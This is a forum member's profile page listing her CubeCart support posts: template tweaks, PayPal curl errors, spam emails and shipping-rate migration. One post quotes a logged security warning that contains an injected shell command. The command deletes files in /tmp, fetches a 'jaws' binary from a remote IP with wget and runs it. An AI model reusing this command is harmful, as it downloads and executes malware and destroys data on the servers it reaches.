Jump to content

Claudia M

Member
  • Posts

    843
  • Joined

  • Last visited

  • Days Won

    13

Everything posted by Claudia M

  1. Hi Ian, I looked at that and though it is a great plugin I think I have things the way I want now. I did purchase the Automatic XML Sitemap Generator from you for my new site but it's showing pending. Is there something I need to do? Claudia
  2. Thank you Brian .... that did it! This should maybe be something that is stock in Cubecart? A lot of people don't really use this for the most current products
  3. I am trying to add a sortable checkbox for latest products on the product inventory page in admin. I change my latest products frequently and want to keep track of them. I can get the checkbox to show up, I just can't get it to work. I've added this so the checkbox doesn't take up a lot of room on the product inventory page <thead> <tr> <th nowrap="nowrap">&nbsp;</th> <th nowrap="nowrap">{$THEAD.name}</th> <th nowrap="nowrap">LP</th> <th nowrap="nowrap">{$THEAD.image}</th> A few lines later I put this <span class="light-category">{$product.category}</span> {/if} </td> <td style="text-align:center"><input type="hidden" name="latest" id="product_latest" class="toggle" value="{$PRODUCT.latest}"></td> <td style="text-align:center"> {if !empty($product.image_path_tiny)} I know I need to put something like this in the source file to make it sortable but I need to get it to work first // Sorting $current_page = currentPage(array('sort')); if (!isset($_GET['sort']) || !is_array($_GET['sort'])) { $_GET['sort'] = array('updated' => 'DESC'); } $thead_sort = array( 'status' => $GLOBALS['db']->column_sort('status', $lang['common']['status'], 'sort', $current_page, $_GET['sort']), 'digital' => $GLOBALS['db']->column_sort('digital', $lang['common']['type'], 'sort', $current_page, $_GET['sort']), 'product_latest' => $GLOBALS['db']->column_sort('product_latest', $lang['catalogue']['type'], 'sort', $current_page, $_GET['sort']), The checkbox won't stay checked and I didn't want to go any further and mess everything up. Thanks for any and all help Claudia
  4. I guess not. I'll just delete them
  5. Brian this is getting annoying. Am I going to get these errors every day from here on out? I opened my error log but there's nothing matching date and time wise. But the logs only go back an hour or two.
  6. I'm setting up my custom page in admin and i get this. The textbox are too long for the country and state and the checkboxes for the default billling and delivery addresses are missing. The only change I have made for the stock CC6.4.5 admin/skin/customer file is adding a sold venue field. I've even left the </span> </span> in the wrong place as in the stock 6.4.5 file. Thanks for any and all help Nevermind - It's working now
  7. So it's ok to ignore it? Cubecart handled it.
  8. What does this error mean? [27-Apr-2022 09:14:57 America/Louisville] PHP Warning: Security Warning: Illegal array key "cd_/tmp;rm_-rf_*;wget_23_94_50_159/jaws;sh_/tmp/jaws" was detected and was removed. in /home/xxxxxxxx/public_html/classes/sanitize.class.php on line 114 This is a brand new site. The only thing I've done is some cosmetic stuff and intergrated Semper_Fi Related Products Module from my old site with the changes Brian gave me to make it work with CC6.4.4 and some custom changes I needed. I exported / imported the database needed from the old store to the new one. I'm running CC6.4.5 on the new site. Also I downloaded my raw access log, but have no way to open it. Thanks in advance for any and all help
  9. Sounds like good instructions to me. I'll give it a go! Thanks!
  10. Hi, I'm starting a new web site and am using the All In One Shipping for both. I have it setup for the older site and was wondering if there is some way I can just copy the rates (database) to the new site from the other database. I need to keep it in the older site too. It's just that they are the same and it would be a lot of work. Thanks in advance, Claudia
  11. Thanks Brian ... I'll implement this asap!
  12. Here's what was in red for the same time. I've x'd out personal and other info. An order for this customer did go thru but not for this amount (value) . Request Sent (cURL) - https://api.paypal.com/v2/checkout/orders/xxxxxxx [{"op":"replace","path":"/purchase_units/@reference_id=='xxxxxxx'/amount","value":{"value":"13.93","currency_code":"USD"}},{"op":"replace","path":"/purchase_units/@reference_id=='xxxxx'/shipping/name","value":{"full_name":"xxxx xxxxx"}},{"op":"replace","path":"/purchase_units/@reference_id==xxxxxx'/shipping/address","value":{"address_line_1":"xxxxx xx","admin_area_1":"xx","admin_area_2":"xxxxx","postal_code":"xxxxx","country_code":"US"}}] Error: cURL Error (22): The requested URL returned error: 422 Response received (422 - Unprocessable Entity)
  13. I saw these errors in my log today. What should I do? [02-Apr-2022 10:16:28 America/Louisville] PHP Warning: curl_error() expects parameter 1 to be resource, null given in /home/xxxxxx/public_html/modules/plugins/paypal_commerce/paypal.class.php on line 856 [02-Apr-2022 10:16:28 America/Louisville] PHP Warning: Failed to update PayPal Commerce Order. Curl error: in /home/xxxxxx/public_html/modules/plugins/paypal_commerce/paypal.class.php on line 856
  14. I looked him up. It's a fake name of course. He is using contact forms on websites and CloudFare to send the emails
  15. I don't have any extensions that send emails. Any way to have them stop sending me emails. I have a bunch more Maybe be able to block the "from" in the email log?
  16. How did this happen and how can I keep it from happening again? And how can I delete them Thanks in advance Claudia
  17. How do I change the tab colors for just products in admin? I can't fifure out which file is it. Thanks in advance, Claudia
  18. Thanks, I customized the Foundation skin quite a bit - with a lot of help!!
  19. I know this is very picky of me, but it is really bugging me. Your formula worked but it isn't carrying the decimal to 2 places (if zeros involved). 50 cents is showing as 0.5 instead of 0.50. One dollar is showing as 1 instead of 1.00 Anyway to correct this Thanks
  20. Thanks Brian! Hey, one more quick question. And if it's to involved that's ok. Per the image below which is in my Special Tab for orders you'll notice that it tells me the cost of the item. Problem is I sold 4 of them and it doesn't give me the total cost for all 4 - just one. Any way I can show a total cost? Thanks Sorry forgot to send the picture
×
×
  • Create New...